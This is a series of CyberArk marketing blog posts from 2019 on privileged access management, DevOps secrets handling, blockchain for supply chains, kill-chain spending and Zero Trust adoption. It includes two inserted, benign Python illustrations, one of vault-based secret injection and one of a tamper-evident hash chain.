  4. Application patching. Software updates are important to your digital safety and overall cybersecurity. The sooner you update, the sooner your endpoint device will be more secure — that is, until the next update. With software updates, it’s all about revisions. These might include fixing newly discovered security holes or fixing or removing bugs. The challenge with patching is that it’s a never-ending job. In fact, studies show it takes enterprises an average of 38 days to patch a security flaw, also known as a software vulnerability. Hackers target these weaknesses by writing code for the software program vulnerability and packaging it into malware. Updating your software is an important step for keeping hackers out.
  5. Operating Systems (OS) patching. Similar to application patching, operating systems also need patching from time to time. OS patches can include critical updates, which, as the name implies, are widely released updates that apply a critical patch to a non-security-related bug. A security patch, on the other hand, is a widely released update that applies a patch to a security-related vulnerability. For instance, each Microsoft patch is accompanied by a Knowledge Base (KB) article identifier. Contained in a repository of over 200,000 articles, these KBs provide in-depth explanations about what was patched, how, the impact and any additional information that the end-user may find useful or necessary, such as the Common Vulnerabilities and Exposures (CVE) identifiers that the update addresses. Apple releases its own equivalent of these OS patches: its security updates are cumulative, and operating system upgrades are delivered on supported hardware. To be truly effective, OS patching must be continuous, not just relegated to specific “patching periods.”

On Beyond Antivirus

Endpoint detection and response, antivirus software, privilege management, application patching and OS patching are each, individually, major contributors to the security of your endpoints. However, to be sure that your laptops, desktops and servers are as protected as possible, you need all five of the essential tools working together.

Many organizations depend upon antivirus software alone to keep their endpoints secure, but that isn’t enough. Privilege management is a key part of a successful security strategy, and establishing a policy of least privilege is essential to it. If you establish access control to ensure that no person has access to more than they need at any given time, it becomes much harder for attackers to escalate privileges and take aim at vital assets. CyberArk is the global leader in privileged access management, and CyberArk Endpoint Manager can help your organization institute a policy of least privilege and get started on your journey to defense in depth.

Thinking about taking the next step to reduce your endpoint attack surface and strengthen your overall cybersecurity? Think least privilege. To discover more benefits of CyberArk Endpoint Privilege Manager, visit here.

5 Reasons to Prioritize Privileged Access Management (PAM) https://www.cyberark.com/blog/5-reasons-to-prioritize-privileged-access-management-pam/ Thu, 08 Aug 2019 13:00:37 +0000 https://www.cyberark.com/?p=71699 Privileged Access Security, principle of least privilege, reduce the risk

Finding the right aspects of cybersecurity to prioritize can present significant challenges. Organizations often lack sufficient resources to deal with emerging threats from both a personnel and budget standpoint. With the limited budgets they do have, security leaders are faced with the “share of wallet challenge.”

Can they effectively utilize existing security investments across complex application stacks and infrastructure while still prioritizing new initiatives? Making matters worse, there’s a never-ending line of solution providers knocking on their doors and competing for time and attention.

Since you cannot do everything, what should you do? When working to prioritize cybersecurity projects and programs, it’s important to think about how security can be a business enabler – not a blocker – for your organization. If you’re a security leader, you want to help drive the conversation with the business about the value of applying strong cybersecurity to modern technologies, not only to mitigate risk and maintain a strong security posture, but also to improve operational efficiencies.

CyberArk recently held a webinar to describe five reasons why securing privileged access is so important and why it should be at the top of your list for security projects and programs for 2019 and beyond. Following are the highlights. To explore these further, and view technical demos, tune in to the on-demand webinar. 

  1. Privileged access is the route to your most critical assets.

In deconstructing publicized cyber attacks, there is often a privileged access-related connection. Privileged access is the gateway to an organization’s most valuable assets and is at the core of nearly every major security breach today.

Here’s a look at a typical (albeit unsophisticated) attack scenario to illustrate this: An attacker sends a successful phishing email to an employee to establish a beachhead of operation on an endpoint. After establishing persistence, the attacker escalates their privileges to gain access to a server account that uses the same credentials. From there, they can move laterally to access target critical assets and data and, ultimately, cause business damage or disruption.

With more users, devices and applications than ever before in digital-first organizations, many security teams are struggling to maintain visibility across their privileged accounts and credentials on-premises, in the cloud and in DevOps environments – let alone manage who has access to what. Yet, privileged access is often an organization’s last line of defense and, therefore, should be the strongest. Securing the privileged access pathway must be top priority.

  2. To err is human.

Humans are… well, human. It doesn’t take much for someone to mistakenly click on a phishing email link or attachment or unintentionally download malicious code on their machine and set off a chain reaction throughout the network. In fact, the 2019 Verizon DBIR report notes that 32 percent of all breaches involve phishing campaigns.

Not only do people make mistakes, they’re often lax when it comes to strict adherence to security best practices – especially if it impacts their productivity. If they can take shortcuts for connecting to sensitive systems, applications and data, they usually will.

And guess what? Cyber attackers are looking to take advantage of ‘low hanging fruit.’ They don’t want to breach a network and then camp out for days or weeks if they don’t have to.

Instead, attackers can target an organization’s cloud console and immediately gain access to their most business critical applications. To stop them, privileged access management (PAM) is paramount.

  3. Privilege doesn’t stop with humans.

In a typical enterprise, the machines and applications that require privileged access to run various routine and important tasks vastly outnumber the actual human users that require privileged access. These non-human identities – from enterprise IT ticketing systems to vulnerability scanners to service accounts – need to be discovered, managed and secured.

As organizations extend their digital transformation strategies to include things like robotic process automation (RPA), they introduce hundreds – even thousands – of new non-human identities that require privileged access and, consequently, expand the attack surface. Managing all of these identities is increasingly important as organizations embrace Zero Trust frameworks.

Implementing a comprehensive privileged access management program will allow your organization to effectively monitor where privileged access exists at every layer, understand which users (both human and non-human) have access to what, detect and alert on malicious or high-risk activity and enhance overall cybersecurity. 

  4. Privilege exists on all employee workstations and endpoints.

Having administrative account access on every workstation creates a huge security gap, as cyber attackers increasingly target the endpoint. Limiting access by removing local administrative rights is critical. It’s a security best practice and, fortunately, it can be easy to do. But it doesn’t stop there.

It’s critical to enforce the principle of least privilege (POLP), giving employees the minimum privileges and access required to perform their job functions. It’s also essential to implement application control to block known malicious applications from running, restrict (or greylist) unknown applications and allow only trusted applications to run.

Extending privileged access management to your organization’s endpoints can help reduce risk by eliminating unnecessary local admin privileges, blocking privileged credential theft attempts and ransomware attacks, auditing malicious behavior and strengthening the security of privileged accounts – all without sacrificing user productivity.

  5. Audit and compliance revolve around privileged access.

Highly regulated industries like banking and healthcare are required to maintain a comprehensive audit trail of privileged user activity. These mandates come at both the enterprise policy level and from industry regulations and compliance frameworks.

There’s a critical need for these organizations to establish individual accountability for all privileged users while also having the ability to review privileged sessions based on risk. Many organizations are required to review a specific percentage of all their privileged workloads, though trying to identify high-risk activity manually can feel like searching for a needle in a haystack.

Implementing strong privileged access controls that enable you to predefine commands, actions and activities, create risk scores and easily pinpoint threats helps to dramatically simplify audit and compliance requirements and save time.

To learn more about how CyberArk can help you start or expand your privileged access management program, attend our webinar, or visit our privileged access management resource library.

How to Establish Enterprise Requirements for DevOps https://www.cyberark.com/blog/how-to-establish-enterprise-requirements-for-devops/ Tue, 06 Aug 2019 13:00:02 +0000 https://www.cyberark.com/?p=71642 DevOps Culture

Editor’s Note: Part 3 of a 5 Part series providing practical guidance and insights to security leaders for securing DevOps environments. This series is based on insights from Global 1000 CISOs. This installment covers how to establish enterprise requirements for securing credentials and secrets in DevOps and cloud environments. This series includes information on how to:

  1. Transform the security team into DevOps partners
  2. Prioritize securing DevOps tools and infrastructure
  3. Establish enterprise requirements for securing secrets and credentials
  4. Adapt processes for application testing
  5. Evaluate the results

Privileged account and credential compromise is at the root of virtually every major cyber attack today. While most security teams have established enterprise requirements for securing privileged credentials in traditional IT systems such as Windows, for both human identities and applications, securing DevOps and cloud-based environments too often lags behind. As organizations accelerate digital transformation initiatives, these requirements must extend to DevOps, cloud and non-human identities. The challenge becomes: how can the security team help make this happen?

Developer and DevOps cultures are very different from security culture. To make security best practices a reality, enterprise security requirements must align with DevOps culture. If developers feel that the security requirements are slowing them down, expect them to resist adopting new measures to protect privileged accounts, credentials and secrets. So, make it easy for developers to adopt secure practices. If there is pushback on adding steps to existing processes, emphasize the operational efficiencies that can be achieved. For example, manually managing privileged credentials takes a lot of effort and puts the responsibility on the developer – offloading this work from the DevOps teams will free up their valuable time.

In this chapter of our CISO View Insights blog series, we’ll explore four best practices for establishing enterprise requirements for securing credentials in modern environments with strong privileged access management. These recommendations are based on the real-world experiences of CISOs from Global 1000 organizations.

  1. Mandate centralized secrets management for DevOps and cloud. Implement a centralized secrets management system that acts as an intermediary between users (both human and non-human/machine identities) and the databases, resources and other tools and critical systems that need to be accessed. This helps keep your secrets secret, since users don’t ever see the actual credentials. For example, if a developer needs access to the cloud console, they authenticate to the secrets management system. The system verifies that they are authorized and provides access to the console without revealing the privileged credentials.

 This centralized system should store all the secrets and credentials used by the developers and DevOps administrators, tools and applications in a tamper-proof vault. It should also provide strong, multi-layered security – from encryption and regular credential rotation to integration with multi-factor authentication (MFA). Additionally, monitoring and logging credential usage helps to instill user accountability. To help detect anomalies quickly, establish a baseline for normal usage patterns and provide each machine its own unique identity to more easily audit and monitor its access to secrets.

  2. Extend enterprise-level capabilities for auditing and monitoring. It is really important to have a complete picture of who has access to what, and to be able to audit and monitor access across your entire environment. You need to be able to answer questions like:
  • What are all the things “Sam” has access to across the enterprise?
  • Where are all the privileged credentials with access to the customer database? Who can access these credentials?
  • Which applications have access to the customer database? Why is Application X on the list?
  • “Mary” recently left the company. Have any of her credentials been used since then?
  • Are DevOps practitioners re-using privileged Windows passwords for other purposes?
  • This machine category typically accesses these three services (a, b, c), so why did it just interact with service “g”?

 The centralized secrets management solution should be integrated with a core system of trust, for instance, using an LDAP server or Active Directory for authentication. Additionally, you need situational awareness when it comes to vulnerabilities, cyber threats and your cybersecurity posture, which calls for integration with controls assurance and analytics solutions like Security Information and Event Management (SIEM) and User and Entity Behavior Analytics (UEBA).

  3. Eliminate privileged credentials from DevOps tools and applications. It’s vital that you remove secrets from all DevOps tools, configuration files, scripts and code and require that these secrets be retrieved, instead, from a secure vault. Make this a key priority and best practice. Because it will likely take time, this essential objective may need to be completed in stages. For instance, you could begin by requiring development of all new applications to adhere to this best practice.

Inadvertently including access keys and credentials in code committed to a repository is a common slip-up, but it has led to multiple breaches and cryptocurrency mining exploits by attackers. To help ensure that developers cannot inadvertently commit code, configuration files or scripts containing secrets to a code repository, secrets, cloud access keys and other sensitive credentials should never be included in code. These standards should be set for both code developed in-house and third-party code.

  4. Develop reusable code modules to provision secrets to applications. Security teams should collaborate closely with their DevOps counterparts to determine how secrets will be provisioned to applications based on application requirements and developer preference. Some may prefer API calls, where an application makes an API call to a secrets vault, which returns a secret to the application. Others may prefer secrets injection, where an intermediary program retrieves secrets and injects them into the application environment. To limit exposure and risk, it’s important to make sure that, when secrets are outside the vault, they are frequently rotated, ephemeral and not persistent. For example, with a memory-mapped file, the secret should be inaccessible when the process exits.
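The secrets-injection pattern from item 4, as an added example (not code from CyberArk or the CISO View report): an intermediary leases a secret from a vault and passes it to the application only through the child process environment, so nothing is written to code, configuration or the command line, and a rotated value is picked up on the application's next start. The in-memory Vault, its lease TTL, the requester name and the secret name db/password are constructed stand-ins.

```python
import hashlib
import os
import subprocess
import sys
import time
from dataclasses import dataclass


def fingerprint(secret: str) -> str:
    """SHA-256 of a secret: lets the application prove receipt without echoing the value."""
    return hashlib.sha256(secret.encode()).hexdigest()


@dataclass
class Lease:
    """A secret handed out for a limited time; callers must re-lease after expiry."""
    value: str
    issued_at: float
    ttl_seconds: float

    def expired(self, now: float = None) -> bool:
        now = time.time() if now is None else now
        return now - self.issued_at >= self.ttl_seconds


class Vault:
    """Stand-in for a secrets manager (constructed): stores secrets, issues short-lived
    leases, supports rotation and logs every read so usage is attributable per requester."""

    def __init__(self, secrets: dict, ttl_seconds: float = 60.0):
        self._secrets = dict(secrets)
        self.ttl_seconds = ttl_seconds
        self.audit = []  # (requester, secret name) for every lease issued

    def lease(self, name: str, requester: str) -> Lease:
        if name not in self._secrets:
            raise KeyError(f"unknown secret {name!r}")
        self.audit.append((requester, name))
        return Lease(self._secrets[name], time.time(), self.ttl_seconds)

    def rotate(self, name: str, new_value: str) -> None:
        self._secrets[name] = new_value


def inject_and_run(vault: Vault, requester: str, secret_name: str, env_var: str, argv: list) -> str:
    """Lease the secret and start argv with it in the child's environment only.
    The parent's own environment, the command line and the filesystem never carry it."""
    lease = vault.lease(secret_name, requester)
    if lease.expired():
        raise RuntimeError("lease expired before the application started")
    child_env = dict(os.environ)
    child_env[env_var] = lease.value
    completed = subprocess.run(argv, env=child_env, capture_output=True, text=True, check=True)
    return completed.stdout.strip()


# The "application" (constructed): reads DB_PASSWORD from its environment and prints only its fingerprint.
APP_SOURCE = (
    "import hashlib, os;"
    "print(hashlib.sha256(os.environ['DB_PASSWORD'].encode()).hexdigest())"
)


def demo() -> dict:
    initial, rotated = "constructed-initial-secret", "constructed-rotated-secret"
    vault = Vault({"db/password": initial}, ttl_seconds=60)
    argv = [sys.executable, "-c", APP_SOURCE]

    first = inject_and_run(vault, "orders-service", "db/password", "DB_PASSWORD", argv)
    vault.rotate("db/password", rotated)  # rotation needs no code or config change in the app
    second = inject_and_run(vault, "orders-service", "db/password", "DB_PASSWORD", argv)

    return {
        "first": first,
        "second": second,
        "secret_on_cmdline": any(initial in a or rotated in a for a in argv),
        "secret_in_parent_env": "DB_PASSWORD" in os.environ,
        "audit": list(vault.audit),
    }


if __name__ == "__main__":
    print(demo())
```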

 For more insights on bringing DevOps and security teams into alignment, download the full CISO View report, Protecting Privileged Access in DevOps and Cloud Environments, watch a short highlights video or tune into our on-demand webinar for a deeper dive. You can also visit our first blog post of the series for an overview.

CyberArk Privilege Cloud Reduces Risk with PAM SaaS https://www.cyberark.com/blog/cyberark-privilege-cloud-reduces-risk-with-pam-saas/ Thu, 01 Aug 2019 16:12:03 +0000 https://www.cyberark.com/?p=71587 PAM SaaS

Creating and executing a successful privileged access management program can seem like a daunting task. Privileged access is pervasive throughout the enterprise and can be difficult to manage without the right tools. Still, protecting privileged access and monitoring its usage is paramount for organizations as they work to secure an evolving digital business.

So, what do you do if you’re an organization that is already stretched for cybersecurity talent and you have a growing list of high priority security projects on your plate with tackling privileged access at or near the top of your list?

Organizations that have not started their privileged access management (PAM) journey should look to the leader in privileged access management, CyberArk, to quickly reduce the risk that unmanaged privileged access presents to every company. The CyberArk Privilege Cloud is delivered via software-as-a-service (SaaS) to simplify customers’ management efforts, removing the need to worry about upgrades or deploying infrastructure. The CyberArk Privilege Cloud also works to shorten the time security teams need to significantly reduce the privileged access risk to the organization. Also, CyberArk is the first SaaS Privileged Access vendor to offer a solution that includes 150+ integrations out of the box to help quickly secure more workloads across the enterprise. Check out the CyberArk Marketplace to find pre-built technical integrations that can help you automatically rotate credentials and manage sessions across a variety of platforms!

CyberArk Privilege Cloud can help organizations with the following use cases:

1. Continuously Discover and Manage Privileged Credentials

CyberArk Privilege Cloud provides a fast and easy way for organizations to begin protecting privileged access. You can quickly onboard and automatically rotate the credentials that your administrators use to access sensitive critical systems across your enterprise to help ensure that access misuse does not negatively impact your business. As new technologies and employees are brought into the organization, you can confidently manage privileged access with a PAM SaaS solution that enables security teams to spend more time on securing privileged access and less time managing the back-end.

2. Isolate Privileged Sessions and Protect Credentials

CyberArk Privilege Cloud can automatically protect connections to a target and make sure the credential is not compromised by initiating a secure proxy that fully isolates each session without ever needing to expose the credential to admins. This improves the security posture of your organization by removing the need to display passwords and, with the integrations of technologies like RDP, SSH and others, CyberArk Privilege Cloud can provide a near seamless experience for administrators.

3. Record and Audit Privileged Sessions to Address Compliance Requirements

Almost every organization must adhere to at least one compliance regulation, and many must adhere to several. Anyone who has been through an audit knows just how arduous that can be. With CyberArk Privilege Cloud, you get a full audit trail of privileged access usage. CyberArk organizes and presents the audit trail data in a way that helps you to quickly prove that you were taking the appropriate steps to secure your company. The audit capabilities can also be critical when tracing the roots of a breach or when you want to see how privilege is being used in your firm.

Over its long tenure in the cybersecurity industry, CyberArk has witnessed many technologies and companies sold, bought and merged, but CyberArk and the CyberArk Core Privilege Access Security Solution have lasted. It is widely considered the leading solution to protect privileged access because it consistently delivers value back to the organization.

CyberArk offers privileged access management solutions and services that enable our customers to build strong privileged access management programs facilitated by our leading SaaS solution. Therefore, CyberArk has introduced Blueprint, the CyberArk Privileged Cloud Success Plan. The Success Plan is a service package that Privilege Cloud customers can select and is designed to help companies get the most from their investment in CyberArk Privilege Cloud and accelerate the adoption of CyberArk for sensitive workloads across the enterprise. A Privileged Access Management expert from CyberArk or a Certified Partner will help build an effective program that defines the repeatable processes to leverage for expanding privileged access management throughout the organization.

CyberArk remains singularly focused on improving the security posture of your organization without adding to your laundry list of daily security tasks. To learn more, please fill out the form here to request a demo and talk to a CyberArk SaaS expert.

 

2019 CyberArk Americas Partner Excellence Awards at Impact Chicago https://www.cyberark.com/blog/2019-cyberark-americas-partner-excellence-awards-at-impact-chicago/ Tue, 30 Jul 2019 16:06:09 +0000 https://www.cyberark.com/?p=71427

At CyberArk, partner collaboration and support are critical to advancing privileged access security innovation and impact. We know that cybersecurity is a team game and that the best way to help protect organizations from cyber attacks is to work together. As one of the industry’s largest networks of security-focused organizations, the CyberArk Partner Network brings together the strengths of advisory consultants, global systems integrators and regional solution providers to address critical privileged access management (PAM) challenges.

The best-in-class program offers partners the industry’s most comprehensive partner enablement offerings to deepen security expertise and extend customer value. With the market-leading CyberArk Privileged Access Security Solution, partners have the flexibility and scalability to capitalize on emerging market trends from cloud and DevOps to Robotic Process Automation, while accelerating their business.

This month at CyberArk Impact Americas conference in Chicago, we had the pleasure of convening with more than 400 partner representatives to explore emerging privileged access security approaches; share on-the-front-lines experiences and tech insights; address questions, challenges and best practices for multi-layered cybersecurity programs and engage in deep technical training.

As part of this event, and to celebrate our partners’ valuable contributions, we were pleased to announce the 2019 recipients of the annual CyberArk Americas Partner Excellence Awards. This year’s winners are:

All Americas

  • Innovative Solution Partner – Cognizant
  • Growth Systems Integrator Partner of the Year – Accenture
  • Global Systems Integrator Partner of the Year – PwC

United States

  • Partner of the Year U.S. – Optiv
  • Growth Reseller Partner – Clango and Gotham

Canada

  • Partner of the Year Canada – Optiv
  • Growth Reseller Partner – ION United

Latin America

  • Partner of the Year Latin America (Mexico) – Arame
  • Growth Reseller Partner – CASD and NovaRed

These awards celebrate top CyberArk channel, systems integrator and solution provider partners in the United States, Canada and Latin America. These partners have demonstrated strengths across a variety of categories including excellence in cybersecurity innovation, commitment to training and skills development, and driving customer success with market-leading privileged access management solutions to help defend against sophisticated cyberattacks.

At Impact, we also unveiled a host of new enablement programs, making it easier than ever for partners to align with market dynamics and grow their businesses through prioritizing privileged access management. These include a new competency-based tier structure, new Certified Sales Professional and Certified Pre-Sales Engineer modules and access to new sales and marketing tools and programs.

We congratulate all of this year’s winners and look forward to our continued collaboration to address today’s most critical privileged access management challenges and shape the future of cybersecurity.

For more information, read about the CyberArk Partner Network.

 

Supply Chain Meets Blockchain: A Perfect Match https://www.cyberark.com/blog/supply-chain-meets-blockchain-a-perfect-match/ Thu, 25 Jul 2019 15:07:30 +0000 https://www.cyberark.com/?p=71352 Block Chain and Supply Chain

Editor’s Note: In late 2018, CyberArk published five cybersecurity predictions for 2019. This deep-dive blog series will examine each prediction in detail to help organizations stay on top of emerging threats and out-innovate and out-maneuver cyber attackers.  One of the goals for this series is to provide updates on how these trends develop and progress over the course of the year. Today’s topic is blockchain for the supply chain industry.

It only takes a quick Google search of “supply chain diagrams” to see how complicated the modern-day supply chain has become. There are numerous – sometimes hundreds or even thousands – of suppliers, partners, third parties, bankers and lawyers involved in the process of producing and distributing products for consumers. As a result, simple data and financial transactions often turn into lengthy, multi-step procedures. Compounding these challenges, supply chains are increasingly frequent targets of cyber crime. A recent Supply Chain Insights study revealed that the number one event impacting supply chains from 2013 to 2018 was cyber attacks or computer hacking.

Blockchain has the potential to turn the tables, helping organizations streamline supply chain management (SCM), bolster cybersecurity across each touchpoint, maximize customer value and maintain a competitive edge. But, first, here’s what you need to know about blockchain technology.

Blockchain 101

Blockchain is an open, distributed ledger that can record business transactions between parties in a secure, verifiable and permanent way. Every time a person records a blockchain transaction, they add a record – or “block” – that others in that particular chain (and only those in that blockchain) can read. Each block contains a cryptographic hash (think of it as a cyber fingerprint), an unchangeable timestamp, the transaction data (typically represented as a “Merkle tree”) and the hash of the previous block to link the two together.

Forrest Williams from the CyberArk Red Team explains it like this: “You can imagine the blockchain as millions of paper bank statements ‘chained’ together with invisible cryptographic chains and new sheets of paper are constantly added as new people spend money.”

Once it is recorded, a block cannot be altered without also altering all other blocks. This means that if someone does attempt to change or erase a block, the blockchain – which is managed and validated by a peer-to-peer network – will compare it to the other distributed copies of the block, quickly find the discrepancy and reject the change, ensuring that the original block remains intact.
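A minimal implementation of the block structure just described, added here as an example (not CyberArk code): each block holds a timestamp, a Merkle root of its transaction data, the previous block's hash and its own hash, and the validation routine shows how an altered block is caught, both through its own hash and through the link from the block that follows it, while a peer comparing its copy against a tampered one finds the first block where they disagree. The shipment records and timestamps are constructed.

```python
import copy
import hashlib
import json
from dataclasses import dataclass


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def merkle_root(transactions: list) -> str:
    """Merkle root of the transaction list: hash each leaf, then pair-hash upward.
    An odd trailing node is paired with itself. Empty list hashes to SHA-256 of nothing."""
    if not transactions:
        return sha256_hex(b"")
    level = [sha256_hex(json.dumps(tx, sort_keys=True).encode()) for tx in transactions]
    while len(level) > 1:
        if len(level) % 2 == 1:
            level.append(level[-1])
        level = [sha256_hex((level[i] + level[i + 1]).encode()) for i in range(0, len(level), 2)]
    return level[0]


@dataclass
class Block:
    index: int
    timestamp: int
    transactions: list
    prev_hash: str
    hash: str = ""  # filled in when the block is sealed

    def compute_hash(self) -> str:
        """Hash over the header fields; the Merkle root binds the transaction data."""
        header = f"{self.index}|{self.timestamp}|{merkle_root(self.transactions)}|{self.prev_hash}"
        return sha256_hex(header.encode())


def build_chain(batches: list, start_time: int = 1_563_000_000) -> list:
    """Genesis block plus one block per batch of transactions (timestamps constructed)."""
    genesis = Block(0, start_time, [], "0" * 64)
    genesis.hash = genesis.compute_hash()
    chain = [genesis]
    for i, txs in enumerate(batches, start=1):
        block = Block(i, start_time + 600 * i, txs, chain[-1].hash)
        block.hash = block.compute_hash()
        chain.append(block)
    return chain


def validate_chain(chain: list):
    """Return (ok, first_bad_index). A block is bad if its stored hash no longer matches
    its recomputed hash (data edited in place) or if its prev_hash no longer matches
    the predecessor's hash (predecessor re-sealed after an edit)."""
    for i, block in enumerate(chain):
        if block.hash != block.compute_hash():
            return False, i
        if i > 0 and block.prev_hash != chain[i - 1].hash:
            return False, i
    return True, None


def first_divergence(chain_a: list, chain_b: list):
    """What a peer does with a distributed copy: recompute block hashes on both sides
    and return the first index where the copies disagree, or None if they match."""
    for i, (a, b) in enumerate(zip(chain_a, chain_b)):
        if a.compute_hash() != b.compute_hash():
            return i
    if len(chain_a) != len(chain_b):
        return min(len(chain_a), len(chain_b))
    return None


def demo() -> dict:
    # Constructed supply-chain records: custody transfers of two lots.
    batches = [
        [{"sku": "MANGO-MX-01", "from": "grower", "to": "packer", "qty": 120}],
        [{"sku": "MANGO-MX-01", "from": "packer", "to": "shipper", "qty": 120},
         {"sku": "PORK-CN-07", "from": "farm", "to": "processor", "qty": 40}],
        [{"sku": "MANGO-MX-01", "from": "shipper", "to": "wholesaler", "qty": 120}],
    ]
    good = build_chain(batches)

    tampered = copy.deepcopy(good)
    tampered[2].transactions[1]["qty"] = 400  # quietly alter a recorded quantity

    resealed = copy.deepcopy(tampered)
    resealed[2].hash = resealed[2].compute_hash()  # forger also fixes block 2's own hash

    return {
        "clean": validate_chain(good),
        "tampered": validate_chain(tampered),        # caught at block 2 by its own hash
        "resealed": validate_chain(resealed),        # caught at block 3 by the broken link
        "divergence": first_divergence(good, tampered),
    }


if __name__ == "__main__":
    print(demo())
```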

Why Blockchain for the Supply Chain?

Large manufacturers are increasingly turning to blockchain to simplify complex “chain of command” processes, reduce costs and transform their supply chains – from sourcing to warehousing to delivery to payment. For example, food and beverage giant Pepsi recently conducted a blockchain trial in Asia Pacific that resulted in a 28 percent boost in supply chain efficiency. Walmart also implemented a blockchain system to better trace food products to their original source and maintain food safety – from tracking pork from China to tracing mangoes from Mexico. And IBM and Maersk co-developed TradeLens, a global shipping supply chain service that uses blockchain technology to help improve process efficiency.

Yet, perhaps blockchain’s greatest promise for the supply chain is enhanced data security for digital records. Following allegations of nation-states targeting the supply chain at the chip level to embed backdoors into both B2B and consumer technologies, organizations are increasingly embracing blockchain to secure their supply chains and reduce the risk of fraud. The distributed nature of blockchain makes it very well suited to validate every step in the supply chain – including the authenticity of hardware and software.

For example, if a wholesaler receives information from a manufacturer, blockchain can authenticate the sender of the data, validate the time the data was sent and ensure that the information has not been tampered with during transmission. With this strengthened security and transparency across each level of the supply chain, organizations are empowered to optimize processes and better manage customer demand.

While blockchain has certainly sparked positive change across the supply chain industry, widespread adoption will not happen overnight. Given its distributed nature, the greatest barriers to blockchain are cooperation and scale. To gain true end-to-end visibility and enhanced data security across the supply chain, it’s not enough for one or two suppliers to employ the technology – all parties must join the blockchain platform and agree to abide by its standards.

Our next installment in the Predictions series will feature the future of trade wars and commercial espionage.

Are You Spending in the Right Places to Break the Cyber Kill Chain? https://www.cyberark.com/blog/are-you-spending-in-the-right-places-to-break-the-cyber-kill-chain/ Tue, 23 Jul 2019 16:19:13 +0000 https://www.cyberark.com/?p=71177

The shift that organizations are undergoing as they move customer and citizen data online, push new services, create new ways to interact, and improve supply chain efficiencies is one of the most seismic things to have happened in IT since cloud…or SDN…or virtualization…or high speed internet.

The latest CyberArk Global Advanced Threat Landscape Report arrives against the backdrop of this change. The impact and demands of digital transformation represent a – potentially – massively expanded attack surface. Bottom line? Right now, it’s really important to be spending your security budget in the right places.

The Cyber Kill Chain
The cyber kill chain model: Focus security spending on blocking lateral movement and privilege escalation attacks.

Consequently, investigating where information security professionals targeted their budgets to combat cyber threats was one of the principal goals of this CyberArk Global Advanced Threat Landscape Report. To do this, CyberArk mapped security professionals’ spending plans against the cyber kill chain – initial infection, reconnaissance, command and control, lateral movement, privilege escalation and disruption and damage. We found that there are two places on the kill chain that represent the areas of greatest risk. The first is the area of initial infection. Our survey shows that half of global organizations believe that there is no way to block all attackers all the time from penetrating the network.

Since it seems clear that some attackers will be able to get in, it’s important that organizations concentrate their spending on technologies that can address the second area of highest risk – blocking lateral movement and privilege escalation. So, it’s good to see that 28 percent of survey respondents are planning on doing just that by focusing their efforts on blocking lateral movement and privilege escalation within their systems over the next two years.

Controls that address these phases of the cyber kill chain can thwart attackers before they can get to what really underpins today’s digital businesses – critical data and assets. With limited resources to bring to an expanding digital threat landscape, organizations need to pick their battles. Protecting critical assets is the fight organizations can’t afford to lose.

Download the eBook to see the full survey results.

Upping the Security Ante: How to Get Teams’ Buy-in for Zero Trust https://www.cyberark.com/blog/upping-the-security-ante-how-to-get-teams-buy-in-for-zero-trust/ Thu, 18 Jul 2019 19:41:07 +0000 https://www.cyberark.com/?p=98923

No one likes change. As technology and security practitioners, we’re hardwired to expect everyone to embrace shiny, new technologies and services, and rush to give them a try as they’re rolled out. But ask anyone who’s led the introduction of a new IT initiative, and they can tell you otherwise.

It’s hard to get an IT team on the same page, let alone a company with thousands of employees. In cybersecurity, where you’re only as strong as your weakest link, it’s paramount to have protection for and from every person across an organization. Look at it this way: it doesn’t matter that you lock your doors and windows if you leave even a single one open. Bad actors will always find the path of least resistance.

In the face of these odds, Zero Trust is rapidly gaining popularity as a proven alternative to traditional security tactics, which can no longer effectively secure the perimeter to let the “good guys” in and keep the “bad guys” out. The Zero Trust motto is “never trust, always verify,” and this approach ensures that every person and device with access is who and what they say they are.

However, the shift to Zero Trust doesn’t happen overnight. Technology is an important element, but the fact is you can’t go out and “buy” a Zero Trust anything. Much like freedom, happiness and New York City, Zero Trust is a state of mind – an idea that holistic organizational shift happens around. In order for it to work, everyone needs to be looking through the same cybersecurity lens.

Bringing Everyone to the Table

When executives ask about the best cybersecurity solution, I always say: “Easy, just unplug everything from the Internet, power down all the computers, and destroy all the smartphones — then you’re secure.” Having the “best” security protocols doesn’t mean anything if the barriers you construct stop the bad guys dead in their tracks, but also kill productivity of the good guys.

For example, most organizations need to find a balance between the end-user experience and improving the security posture. In fact, on average, business users spend 11 hours per year entering and/or resetting passwords, which costs organizations an estimated average of $5.2 million annually in lost labor and productivity, according to Ponemon. That’s where Zero Trust comes in, improving access control without compromising business agility and convenience.

But when it comes to any kind of organizational change, people are always at the heart of it. It doesn’t necessarily matter that a new login experience like single sign-on (SSO) is more secure and seamless; ultimately it’s still different for users. Employees who left on Friday doing it one way come back on Monday to find everything changed. If they weren’t anticipating that, they might even call the help desk.

That’s why it must always start with the people. It’s important to communicate the reasons for change, the benefits to the user, and the importance to the organization. You can’t get to Zero Trust without that education and culture element to get people on board.

Assess the Strength of Your Hand

The fact is that a lot of the elements of Zero Trust are already implemented in some pockets of every organization. There might be key features like single sign-on (SSO) or multi-factor authentication (MFA) for certain apps or services, but for a holistic Zero Trust practice, those ideas must extend across the organization and touch everything you do.

Zero Trust provides a strategic lens to evaluate where the organization stands on cybersecurity and the resources you’re trying to protect. Once everyone is looking through the same lens, you can determine the strength of your hand, and come up with your next move.

This set of initiatives should be calculated and prioritized based on your greatest risks. For example, it might be most important for the organization to protect customer data, or maintain compliance around financial or healthcare records, or help employees gain access to critical services more quickly.

Going All-In

Betting it all on Zero Trust doesn’t mean you should throw away your currently deployed technologies that keep the perimeter safe. Rather it’s a philosophical approach to improving your security posture over time.

Zero Trust is a lot like building code. You can’t just drop in a new string of code if it causes the existing system to crash. For new code (IT initiatives) to be put in place successfully, you need to be sure it conforms to the (cybersecurity) standard already set. It must be tied into and governed by the same access system that everything else is. And you’re never really done making updates.

That’s why it’s important to have broad evangelism and buy-in from across the organization. When people see Zero Trust in action as part of a proactive and strategic approach, instead of a random change that is viewed as disruptive, it becomes much easier to roll out new user and customer experiences.

In our next blog, we’ll talk more about that road to becoming Zero Trust, and how to seamlessly unite old with the new when it comes to your cybersecurity technology stack.


Read the Zero Trust series here:

Zero Trust Series – 1 What Is Zero Trust and Why Is it So Important?

Zero Trust Series – 2 Like the Night King, Perimeter Defense is Dead

Zero Trust Series – 3 Imposter Syndrome: Why You Can’t Separate the “Good Guys” from the “Bad Guys”

Zero Trust Series – 4 Passwords are Just one Piece of the Cybersecurity Puzzle

Zero Trust Series – 5 The Future of Cybersecurity is Artificial: Intelligence Will Transform Enterprise Governance

